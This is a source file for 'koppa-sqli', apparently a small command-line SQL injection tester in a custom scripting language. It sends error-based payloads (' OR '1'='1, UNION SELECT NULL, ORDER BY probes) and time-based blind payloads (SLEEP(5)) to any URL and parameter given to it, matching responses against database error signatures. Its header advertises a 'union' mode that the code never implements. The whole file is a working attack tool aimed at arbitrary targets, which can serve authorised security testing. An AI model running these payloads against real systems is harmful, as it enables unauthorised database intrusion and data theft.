# koppa-sqli v1.0 — SQL Injection tester
# Usage: koppa run koppa-sqli <url> <param> [error|time|union]

import http, fuzz, encode, log, report, str, time

let PAYLOADS_ERROR = ["'", "\"", "' OR '1'='1", "' OR 1=1--",
                      "1 ORDER BY 1--", "1 ORDER BY 99--",
                      "' UNION SELECT NULL--", "1 AND 1=2"]
let ERROR_SIGS = ["sql syntax", "mysql_fetch", "ora-", "unterminated",
                  "odbc", "sqlite", "pg_query", "syntax error"]

fn cmd_error(url, param) {
    log.info("===== Error-Based SQLi: {url} [{param}] =====")
    let findings = []
    for pay in PAYLOADS_ERROR {
        let enc  = encode.url_encode(pay)
        let resp = http.get("{url}?{param}={enc}")
        let body = resp.body
        for sig in ERROR_SIGS {
            let hit = str.contains(body, sig)
            if hit {
                log.success("[+] SQLi confirmed! Payload: {pay}  Sig: {sig}")
                findings.push(report.finding("SQL Injection", "Critical", "Payload: {pay}"))
            }
        }
    }
    if findings.len == 0 { log.warn("[-] No error-based SQLi detected") }
    return findings
}

fn cmd_time(url, param) {
    log.info("===== Time-Based Blind SQLi =====")
    let payloads = ["' OR SLEEP(5)--", "1; SELECT SLEEP(5)--",
                    "' AND SLEEP(5) AND '1'='1"]
    for pay in payloads {
        let enc     = encode.url_encode(pay)
        let t0      = time.now_ms()
        http.get("{url}?{param}={enc}")
        let elapsed = time.now_ms() - t0
        if elapsed > 4500 {
            log.success("[+] Time-based SQLi! Payload: {pay}  ({elapsed}ms)")
            return true
        }
    }
    log.warn("[-] No time-based SQLi detected")
    return false
}

fn run_sqli(url, param, mode) {
    if mode == "error" or not mode { cmd_error(url, param) }
    if mode == "time"  { cmd_time(url, param) }
    log.success("SQLi test complete!")
}

fn main() {
    let url   = __args__[0]
    let param = __args__[1]
    let mode  = __args__[2]
    log.info("===== KOPPA SQLi Tester v1.0 =====")
    if url and param {
        run_sqli(url, param, mode)
    }
    if not url or not param {
        log.warn("Usage: koppa run koppa-sqli <url> <param> [error|time]")
    }
}
